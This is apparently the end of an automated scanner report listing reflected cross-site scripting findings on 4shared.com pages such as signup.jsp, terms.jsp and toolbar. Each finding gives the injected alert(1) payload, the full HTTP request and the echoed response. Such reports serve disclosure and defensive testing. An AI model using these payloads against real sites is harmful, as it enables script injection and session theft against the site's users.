HTTP/1.1 404 /servlet/ProgressStatus7f58a'-alert(1)-'fc1f97d341c
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=21962FDC58EF1EB23D11759665E49D3E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:11 GMT
Connection: close
Content-Length: 36173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/servlet/ProgressStatus7f58a'-alert(1)-'fc1f97d341c',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.340. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/servlet/ProgressStatus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bde4"-alert(1)-"3d9d65c0126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ProgressStatus1bde4"-alert(1)-"3d9d65c0126 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /servlet/ProgressStatus1bde4"-alert(1)-"3d9d65c0126
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=086DAEE5CF634084B2B41CA6EAB6A38E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:10 GMT
Connection: close
Content-Length: 36173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/servlet/ProgressStatus1bde4"-alert(1)-"3d9d65c0126";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.341. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signUpBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 294b8'-alert(1)-'f2dcd44df69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jsp294b8'-alert(1)-'f2dcd44df69?df=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BF)%3C/script%3E&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029

Response

HTTP/1.1 404 /signUpBox.jsp294b8'-alert(1)-'f2dcd44df69
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 22:04:05 GMT
Content-Length: 36149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '3',
password : '3',
fpRedirParam : 'http://www.4shared.com/signUpBox.jsp294b8'-alert(1)-'f2dcd44df69',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.342. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signUpBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32833"-alert(1)-"cfb3f47bbd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jsp32833"-alert(1)-"cfb3f47bbd9?df=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BF)%3C/script%3E&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029

Response

HTTP/1.1 404 /signUpBox.jsp32833"-alert(1)-"cfb3f47bbd9
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 22:04:03 GMT
Content-Length: 36149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signUpBox.jsp32833"-alert(1)-"cfb3f47bbd9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.343. http://www.4shared.com/signUpBox.jsp [df parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signUpBox.jsp

Issue detail

The value of the df request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddab9"><script>alert(1)</script>9c513f7cbd was submitted in the df parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jsp?df=ddab9"><script>alert(1)</script>9c513f7cbd&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppVisited=%2FsignUpBox.jsp%3Fdf%3Dddab9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9c513f7cbd%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1298498477263; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 22:01:16 GMT
Content-Length: 7494

<div id="loginhandle">
<table cellpadding="1" cellspacing="0" width="100%">
<tr>
<td> <span>Sign Up</span></td>
<td><a href="javascript:signUpB
...[SNIP]...
<input type="hidden" name="df" value="ddab9"><script>alert(1)</script>9c513f7cbd">
...[SNIP]...

1.344. http://www.4shared.com/signUpBox.jsp [df parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signUpBox.jsp

Issue detail

The value of the df request parameter is copied into the HTML document as plain text between tags. The payload ac2e2<script>alert(1)</script>df8b510e5d was submitted in the df parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jsp?df=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BF)%3C/script%3Eac2e2<script>alert(1)</script>df8b510e5d&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253Eac2e2%3Cscript%3Ealert%281%29%3C%2Fscript%3Edf8b510e5d%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1298498479570; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 22:01:18 GMT
Content-Length: 7546

<div id="loginhandle">
<table cellpadding="1" cellspacing="0" width="100%">
<tr>
<td> <span>Sign Up</span></td>
<td><a href="javascript:signUpB
...[SNIP]...
</script>ac2e2<script>alert(1)</script>df8b510e5d">
...[SNIP]...

1.345. http://www.4shared.com/signup.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c443"-alert(1)-"b44cf3dbe12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.jsp4c443"-alert(1)-"b44cf3dbe12 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /signup.jsp4c443"-alert(1)-"b44cf3dbe12
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=268104592EEF35F1BCDF06557DB32B3E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:37 GMT
Connection: close
Content-Length: 36113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signup.jsp4c443"-alert(1)-"b44cf3dbe12";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.346. http://www.4shared.com/signup.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f860'-alert(1)-'2f8bf30fcb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.jsp7f860'-alert(1)-'2f8bf30fcb8 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /signup.jsp7f860'-alert(1)-'2f8bf30fcb8
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=53EC39F9249A95804C1F6F68B499251E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:38 GMT
Connection: close
Content-Length: 36113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/signup.jsp7f860'-alert(1)-'2f8bf30fcb8',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.347. http://www.4shared.com/terms.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/terms.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d37be'-alert(1)-'64d40d83c1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /terms.jspd37be'-alert(1)-'64d40d83c1c HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /terms.jspd37be'-alert(1)-'64d40d83c1c
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A33112ECB9EBF7C8FCDB0052CDF9B7E5.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:42 GMT
Connection: close
Content-Length: 36108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/terms.jspd37be'-alert(1)-'64d40d83c1c',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.348. http://www.4shared.com/terms.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/terms.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57f3"-alert(1)-"9c05979d3ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /terms.jspe57f3"-alert(1)-"9c05979d3ce HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /terms.jspe57f3"-alert(1)-"9c05979d3ce
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7BC84744D8C8E0B856E9FF1EA865D23.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:42 GMT
Connection: close
Content-Length: 36108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/terms.jspe57f3"-alert(1)-"9c05979d3ce";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.349. http://www.4shared.com/toolbar/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/toolbar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77634"-alert(1)-"5c89a3db097 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar77634"-alert(1)-"5c89a3db097/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /toolbar77634"-alert(1)-"5c89a3db097/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FF003921E256104E37362C0111F5A032.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:40 GMT
Connection: close
Content-Length: 36103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/toolbar77634"-alert(1)-"5c89a3db097/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.350. http://www.4shared.com/toolbar/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/toolbar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c67'-alert(1)-'2ab3ec1f954 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar71c67'-alert(1)-'2ab3ec1f954/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /toolbar71c67'-alert(1)-'2ab3ec1f954/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6E011D7E378DF665AC49AE9B29B6DF70.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:41 GMT
Connection: close
Content-Length: 36092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/toolbar71c67'-alert(1)-'2ab3ec1f954/',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function en
...[SNIP]...

1.351. http://www.4shared.com/icons/16x16/ [Referer HTTP header] previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8177c--><script>alert(1)</script>e023ffda58 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /icons/16x16/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
Referer: http://www.google.com/search?hl=en&q=8177c--><script>alert(1)</script>e023ffda58

Response

HTTP/1.1 404 /icons/16x16/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CDCAA8180B4589E683BFFEE2BBFE5DE6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:32 GMT
Connection: close
Content-Length: 36059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>e023ffda58-->
...[SNIP]...

Report generated by XSS.CX Research Blog at Tue Mar 01 08:44:05 CST 2011.